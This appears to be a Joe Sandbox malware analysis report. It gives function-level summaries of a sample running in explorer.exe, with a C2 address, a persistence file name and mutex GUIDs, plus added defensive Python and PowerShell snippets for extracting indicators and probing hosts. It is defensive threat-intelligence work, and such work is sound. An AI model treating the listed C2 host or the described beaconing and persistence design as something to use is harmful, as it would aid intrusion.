• Instruction Fuzzy Hash: 1A415270114BC086E738DB30FD5935E73A1FBA4785F505E2AD68AA66A4DF3EC588C740

Control-flow Graph: entry block e07ef0-e0800f
• API calls in graph: CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize, CoCreateGuid, StringFromGUID2
APIs
  • Part of subcall function 00E17DA0: lstrlenW.KERNEL32 ref: 00E17DEC
• CoInitializeEx.COMBASE ref: 00E07FFA
• CoInitializeSecurity.COMBASE ref: 00E0804F
• CoUninitialize.COMBASE ref: 00E08E02
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Similarity
• API ID: Initialize$SecurityUninitializelstrlen
• String ID: PT%dS$PT0S$d$default
• API String ID: 1917595471-1758076759
• Opcode ID: 4e90035ec76b44f55509a06cae46d70251e4bebeacf918fb3399efe7daf0ae58
• Instruction ID: f374923ac95c483049660372fe32757451e57fb74ca43f085027c5b94e8e82d5
• Opcode Fuzzy Hash: 4e90035ec76b44f55509a06cae46d70251e4bebeacf918fb3399efe7daf0ae58
• Instruction Fuzzy Hash: 9782A236209FC4C6DA71DB15E8943DAB3A5F3C8B91F405126DA8D93B68DF39C689CB40
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E1DB10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                                                                                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                                                            • API String ID: 1452691613-63410773
                                                                                                            • Opcode ID: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                                                            • Instruction ID: 6333354a99b8cbd41ddcad6d807c245dce370f8973fa518da3aa62f6c470be9c
                                                                                                            • Opcode Fuzzy Hash: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                                                            • Instruction Fuzzy Hash: 69510B3261CA8083E754CF15F88479AB7A1F7D4784F506915F68A93A68CFBEC884CB40
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32 ref: 00E22386
                                                                                                            • CreateEventW.KERNEL32 ref: 00E223D6
                                                                                                            • CreateThread.KERNEL32 ref: 00E2240C
                                                                                                            • CloseHandle.KERNEL32 ref: 00E2242C
                                                                                                            • WSAStartup.WS2_32 ref: 00E2243B
                                                                                                            • CreateThread.KERNEL32 ref: 00E2246D
                                                                                                            • CreateThread.KERNEL32 ref: 00E22499
                                                                                                              • Part of subcall function 00E1DDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00E1DE32
                                                                                                              • Part of subcall function 00E1DDC0: CheckTokenMembership.ADVAPI32 ref: 00E1DE4F
                                                                                                              • Part of subcall function 00E1DDC0: FreeSid.ADVAPI32 ref: 00E1DE66
                                                                                                            • WSACleanup.WS2_32 ref: 00E224B7
                                                                                                              • Part of subcall function 00E0F510: SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                              • Part of subcall function 00E0F510: LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                              • Part of subcall function 00E0F510: CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                              • Part of subcall function 00E07EF0: CoInitializeEx.COMBASE ref: 00E07FFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$FreeThreadlstrlen$InitializeLocal$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken_errno_invalid_parameter_noinfo
                                                                                                            • String ID: "%s%s"$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                                                                            • API String ID: 2779143808-474631092
                                                                                                            • Opcode ID: 395866f993da45b9c750652c6559c33394b50d3bb72537e97a8bc5148c645c89
                                                                                                            • Instruction ID: daf89f6b2a87d8303da4a912b0628bf4f7edb3f67ebd197a01d0c1f507e311a6
                                                                                                            • Opcode Fuzzy Hash: 395866f993da45b9c750652c6559c33394b50d3bb72537e97a8bc5148c645c89
                                                                                                            • Instruction Fuzzy Hash: 13515D31104BD196E738EB20F95879A33A5F39838CF50592AD65977AA4DF7DC688CB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
                                                                                                            • API String ID: 2574300362-2969658442
                                                                                                            • Opcode ID: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                                                            • Instruction ID: 23cbf21329673fe4d30980291d1ecb8da0fafc2605024ca1979bb1053c9507d1
                                                                                                            • Opcode Fuzzy Hash: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                                                            • Instruction Fuzzy Hash: A0B2E336219BC5C5EB30CB14E4943EAB3A0F7D9B45F501916CA8EA3B69DF38C589CB41

                                                                                                             Control-flow Graph
                                                                                                             • Function: e26370 (the graph itself is rendered as an image and is not reproduced here; the Executed / Not Executed colouring of blocks is lost in text). APIs called from its basic blocks: WaitForSingleObject, WaitForMultipleObjects, setsockopt, shutdown, closesocket, CloseHandle, LocalFree, WSAEnumNetworkEvents, recv, WSACreateEvent, WSAEventSelect. Internal subcalls: e21f90, e23b40, e24c90, e24740, e22660.
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID: 185.157.162.216$8${8E8A4502-77C1-498F-9A62-1CFFC74945A4}
                                                                                                            • API String ID: 3117981272-2772078998
                                                                                                            • Opcode ID: a5040a68671dcfb0dfe58ac7fac9030a3d34697973cce43685bc7efebe8f99a8
                                                                                                            • Instruction ID: 442509c728517c0f6bac57f0e9184906eb7c498e04d7fd23c46461e4a8166aac
                                                                                                            • Opcode Fuzzy Hash: a5040a68671dcfb0dfe58ac7fac9030a3d34697973cce43685bc7efebe8f99a8
                                                                                                            • Instruction Fuzzy Hash: 5B32D732218AD4C6DB719B15F8893DAB361F7D8798F605216D6C9A3B68CF7EC448CB00
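The function summaries above carry the indicators a responder needs: the C2 address 185.157.162.216, the two GUID-shaped strings used alongside mutex/event handling, the persistence file name WindowsSystem.exe and the list of DLLs resolved at run time through LoadLibrary/GetProcAddress. Below is an added example, not part of the Joe Sandbox report or product, that pulls those indicators out of the "String ID" lines of such summaries. The parsing logic and regular expressions are mine; the sample input is constructed by copying "String ID" lines from the blocks on this page, and the anchored regex deliberately skips the "API String ID" hash lines.

```python
"""Extract IOCs from Joe Sandbox function-summary text.

Added example, not part of the Joe Sandbox report or product: the parsing
logic and regular expressions are the editor's. The input below is
constructed by copying "String ID" lines from the function summaries in
this report.
"""
import re

# Constructed sample: "String ID" lines copied from the function summaries
# above (persistence block, dynamic-import block, crypto block, C2 block),
# plus one "API String ID" line and one empty line to show they are skipped.
SAMPLE_REPORT = """\
• String ID: "%s%s"$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
• API String ID: 2779143808-474631092
• String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
• String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
• String ID: 185.157.162.216$8${8E8A4502-77C1-498F-9A62-1CFFC74945A4}
• String ID:
"""

# Anchored so that "API String ID: <hash>-<hash>" lines never match.
STRING_ID_RE = re.compile(r"^\s*[•*-]?\s*String ID:\s*(.*)$")
IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)
GUID_RE = re.compile(
    r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.IGNORECASE
)
FILE_RE = re.compile(r"^[\w.-]+\.(exe|dll|bat|vbs|ps1|cmd)$", re.IGNORECASE)


def string_literals(report_text):
    """Yield every literal on the 'String ID:' lines of a function summary.

    The IDA plugin joins a function's referenced strings with '$', so a
    literal that itself contains '$' is split as well; that is a limitation
    of the textual format, not something this parser can recover.
    """
    for line in report_text.splitlines():
        m = STRING_ID_RE.match(line)
        if not m:
            continue
        for literal in m.group(1).split("$"):
            literal = literal.strip()
            if literal:
                yield literal


def classify(literal):
    """Map one literal to an IOC class, or None when it is not an indicator
    (format strings, bare numbers, bare words such as 'WindowsSystem')."""
    if IPV4_RE.match(literal):
        return "ipv4"
    if GUID_RE.match(literal):
        # GUID-shaped strings in this sample sit next to mutex/event
        # handling, which makes them a usable host-based indicator.
        return "guid"
    m = FILE_RE.match(literal)
    if m:
        # DLL names are the dynamically resolved imports; other extensions
        # are dropped/persisted file names.
        return "dll" if m.group(1).lower() == "dll" else "file"
    return None


def extract_iocs(report_text):
    """Return order-preserving, de-duplicated IOCs grouped by class."""
    iocs = {"ipv4": [], "guid": [], "file": [], "dll": []}
    for literal in string_literals(report_text):
        kind = classify(literal)
        if kind is not None and literal not in iocs[kind]:
            iocs[kind].append(literal)
    return iocs


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_REPORT).items():
        print(f"{kind:5s} {', '.join(values) if values else '-'}")
```

The regex anchor is the important detail: a naive `"String ID" in line` check also matches the "API String ID" hash lines, which then leak numeric junk into the indicator list. Treat the GUID strings as indicators for this sample only; other families reuse well-known GUIDs, so check them against the mutex/event activity in the behaviour section before deploying a detection.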

                                                                                                             Control-flow Graph
                                                                                                             • Function: e23b40 (graph rendered as an image; not reproduced here, Executed / Not Executed colouring lost in text). APIs called from its basic blocks: socket, WSAGetLastError, WSACreateEvent, WSAEventSelect, inet_addr, gethostbyname, htons, connect, WSAWaitForMultipleEvents, WSAEnumNetworkEvents, WSACloseEvent, shutdown, closesocket, CloseHandle. Internal subcalls: e241b0, e24340.
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorEventLastclosesocketshutdownsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1739004367-0
                                                                                                            • Opcode ID: 69f75d45d796d6a2e56a1c98d5b3a4757a772b6911a268e01388c250a9e22193
                                                                                                            • Instruction ID: 901d0da4fb920733cd2985bebcd5732ef63f0480be19820b665961ff15b7f2f1
                                                                                                            • Opcode Fuzzy Hash: 69f75d45d796d6a2e56a1c98d5b3a4757a772b6911a268e01388c250a9e22193
                                                                                                            • Instruction Fuzzy Hash: CFF1EB76219AD0CAD7608F25F84479AB7B0F798B94F102516EA8A97B68DF3DC584CF00

                                                                                                             Control-flow Graph
                                                                                                             • Function: e25f4b (graph rendered as an image; not reproduced here, Executed / Not Executed colouring lost in text). APIs called from its basic blocks: setsockopt, CreateEventW, LocalAlloc, CreateThread, GetTickCount, WaitForSingleObject, SleepEx, SetEvent, WSAGetLastError, shutdown, closesocket, ReleaseMutex, CloseHandle, LocalFree, ExitProcess. Internal subcalls: e26f30, e21f90, e26dd0, e13ae0, e23370.
                                                                                                            Strings
                                                                                                            • {8E8A4502-77C1-498F-9A62-1CFFC74945A4}, xrefs: 00E26249
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                                                                                                            • String ID: {8E8A4502-77C1-498F-9A62-1CFFC74945A4}
                                                                                                            • API String ID: 2113405211-3742775516
                                                                                                            • Opcode ID: 448dfe744ec1d3ef1730e3037207e70b8fb484f9580361bde58bd3a9b703e152
                                                                                                            • Instruction ID: f137288a88ab53c1cad3b5a3e42afbd8861ac4068f05c57e95e4b2e9b8cad908
                                                                                                            • Opcode Fuzzy Hash: 448dfe744ec1d3ef1730e3037207e70b8fb484f9580361bde58bd3a9b703e152
                                                                                                            • Instruction Fuzzy Hash: 28911231114AD0C2E714DF65F95835EB3A1F7E0794F206626D68AA3AB8CFBDC489CB40

Control-flow Graph
• Function e1d590: rendered graph omitted; only the API calls recoverable from the node listing are kept, in address order: OpenMutexW, LoadLibraryW, LocalAlloc (e1d590), GetModuleFileNameW (e1d5f4), call e21e10 (e1d615), a second OpenMutexW (e1d638); a chain of internal calls (e017c0, e04050, e178a0, e13a60, e22210, e05230, e044b0, e09c50, e1d67a-e1d718) in which every failure branch jumps to the cleanup block at e1d978; CreateMutexExW (e1d71a), then two CreateMutexW (e1d766, e1d7b2) interleaved with calls to e1e280, e09d70 and e09e90; call e0fa60 and Sleep (e1d830-e1d854); call e07770 (e1d863); a GetFileAttributesW / DeleteFileW / SleepEx retry loop (e1d892-e1d8e2) followed by LocalFree (e1d8e4); WaitForSingleObject (e1d8fb); WaitForMultipleObjects and SetEvent (e1d932); cleanup through calls to e01860, e04140, e04560, e05290, e17910 (e1d978) ending in ExitProcess (e1d995) or in call e224e0, CloseHandle ×3, LocalFree and ExitProcess (e1d99d-e1da15).
                                                                                                            APIs
                                                                                                            • OpenMutexW.KERNEL32 ref: 00E1D5A5
                                                                                                            • LoadLibraryW.KERNEL32 ref: 00E1D5B9
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E1D5D7
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E1D601
                                                                                                            • ExitProcess.KERNEL32 ref: 00E1D997
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E224FF
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E2251B
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E22532
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E22549
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E22565
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E2257C
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E22593
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E225AA
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E225C6
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E225DD
                                                                                                              • Part of subcall function 00E224E0: SetEvent.KERNEL32 ref: 00E225F4
                                                                                                              • Part of subcall function 00E224E0: WaitForSingleObject.KERNEL32 ref: 00E22610
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E22627
                                                                                                              • Part of subcall function 00E224E0: CloseHandle.KERNEL32 ref: 00E2263E
                                                                                                            • CloseHandle.KERNEL32 ref: 00E1D9B3
                                                                                                            • CloseHandle.KERNEL32 ref: 00E1D9C6
                                                                                                            • CloseHandle.KERNEL32 ref: 00E1D9F1
                                                                                                            • LocalFree.KERNEL32 ref: 00E1DA04
                                                                                                            • ExitProcess.KERNEL32 ref: 00E1DA15
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                                                            • String ID: KERNEL32.DLL${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}${7E105FD4-6112-4FB9-A722-91E984087449}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 2953619224-1144826392
                                                                                                            • Opcode ID: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                                                            • Instruction ID: b1d4aa33ac36569f3ecdfb4a1cdf45983bdec690cd602fc275fd2f157d3956bf
                                                                                                            • Opcode Fuzzy Hash: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                                                            • Instruction Fuzzy Hash: 16B15C3110CB80C6E724DB24FD483DA77A0FB94398F506916E68AB66A4DF7DC5C8CB01
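
An added host-triage check (example code, not part of the Joe Sandbox report or of the analyzed sample): the GUID strings listed under Strings for the functions at e1d590 and e25f4b above, and for e09ac0 further down, are used with OpenMutexW / CreateMutexW / CreateMutexExW / ReleaseMutex and, in e09ac0, with OpenEventW / SetEvent, so a running instance should expose them as named kernel objects. The PowerShell below tries to open each name from the current session. It assumes two things the report does not show: the kernel namespace of the objects (the bare name and the Global\ prefix are both tried) and the object type behind each name (every name is probed as both a mutex and an event).

```powershell
# Added example: probe a host for the GUID-named mutexes / events that the
# report lists under "Strings". Not code from the report or the sample.
# Assumptions (not shown in the report): the kernel namespace of the objects
# and the object type behind each name, so every name is tried as a mutex
# and as an event, with and without the Global\ prefix.

$Names = @(
    '{8E8A4502-77C1-498F-9A62-1CFFC74945A4}'   # e25f4b: ReleaseMutex path
    '{6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}'   # e1d590: OpenMutexW / CreateMutex*
    '{7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}'
    '{7E105FD4-6112-4FB9-A722-91E984087449}'
    '{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}'
    '{FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}'
    '{DD700AA6-D197-4A4A-838A-B93EA96F236B}'   # e09ac0: OpenEventW / SetEvent
)

function Test-NamedObject {
    <# Returns one record per probe. Result is 'absent', 'PRESENT',
       'PRESENT (access denied)' or 'error: <message>'. #>
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][ValidateSet('Mutex', 'Event')][string]$Kind
    )
    $handle = $null
    $result = 'absent'
    try {
        # TryOpenExisting returns $false when no object of that name exists
        # (including when the name belongs to an object of another type).
        $opened = if ($Kind -eq 'Mutex') {
            [System.Threading.Mutex]::TryOpenExisting($Name, [ref]$handle)
        } else {
            [System.Threading.EventWaitHandle]::TryOpenExisting($Name, [ref]$handle)
        }
        if ($opened) {
            $result = 'PRESENT'
            $handle.Close()            # we only needed to know it exists
        }
    } catch [System.UnauthorizedAccessException] {
        # The object exists but this token may not open it: still a hit.
        $result = 'PRESENT (access denied)'
    } catch {
        $result = "error: $($_.Exception.Message)"
    }
    [pscustomobject]@{ Name = $Name; Kind = $Kind; Result = $result }
}

$probes = foreach ($name in $Names) {
    foreach ($prefix in @('', 'Global\')) {
        foreach ($kind in @('Mutex', 'Event')) {
            Test-NamedObject -Name ($prefix + $name) -Kind $kind
        }
    }
}

$hits = @($probes | Where-Object { $_.Result -ne 'absent' })
if ($hits.Count -gt 0) {
    $hits | Format-Table -AutoSize
} else {
    'None of the report-listed mutex/event names is currently open on this host.'
}
```

Run it from the same logon session as the suspected explorer.exe (the snapshot file name shows this code executing inside explorer.exe), because session-local names are not visible from session 0 or a remote session unless they were created under Global\. An absent result only says that no instance currently holds the object; the names may also differ between builds of the sample, so treat this as a confirmation aid rather than a clearance.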

Control-flow Graph
• Function e16790: rendered graph omitted; only the API calls recoverable from the node listing are kept, in address order: internal calls e159a0, e0f790, e15a80 (e16790-e16800); LocalAlloc (e16806); lstrcpyW, StrStrIW, CreateFileW (e16827); GetFileSize (e1689a); LocalAlloc (e168b6); ReadFile (e168d8); CloseHandle (e1690f); a loop calling e1cee0 (e16996), then call e20d00 (e169e0) and call e17330 (e16a01); two further LocalAlloc (e16a29, e16a50); call e28b30 and lstrcpyW ×3 (e16a77); on the path through e16c48, call e172b0 then VirtualFree (e16c68); LocalFree on the exit paths (e16be3 ×4, e16c21, e16c2f, e16c92, e16cb0-e16ce6).
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                                                            • String ID: .DLL
                                                                                                            • API String ID: 2968648924-899428287
                                                                                                            • Opcode ID: ef9ae1e3439dff997b194165b7588088cf234c411f7acbd89f642e98992375f6
                                                                                                            • Instruction ID: 6b88ba29e605e9966cddefb55dede03bb68c837bdfd07612189726e82b2a2f71
                                                                                                            • Opcode Fuzzy Hash: ef9ae1e3439dff997b194165b7588088cf234c411f7acbd89f642e98992375f6
                                                                                                            • Instruction Fuzzy Hash: 76D1D336208BC082E764DB15F89439AB7A1F3C4794F505626DADE93BA8DF3DD489CB40

Control-flow Graph
• Function e259a0: rendered graph omitted; only the API calls recoverable from the node listing are kept, in address order: LocalAlloc (e259a0), LoadLibraryW (e259c8), GetProcAddress (e259f4), call e291b0 then RtlGetVersion (e25a25), GetUserGeoID and gethostname (e25a60), gethostbyname (e25ad7), GetComputerNameExW (e25afc), GetUserNameW (e25b43), GetTickCount64 (e25b6d); LocalFree on each failure path (e259e2, e25a13, e25a4e, e25b86).
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E259B1
                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259CF
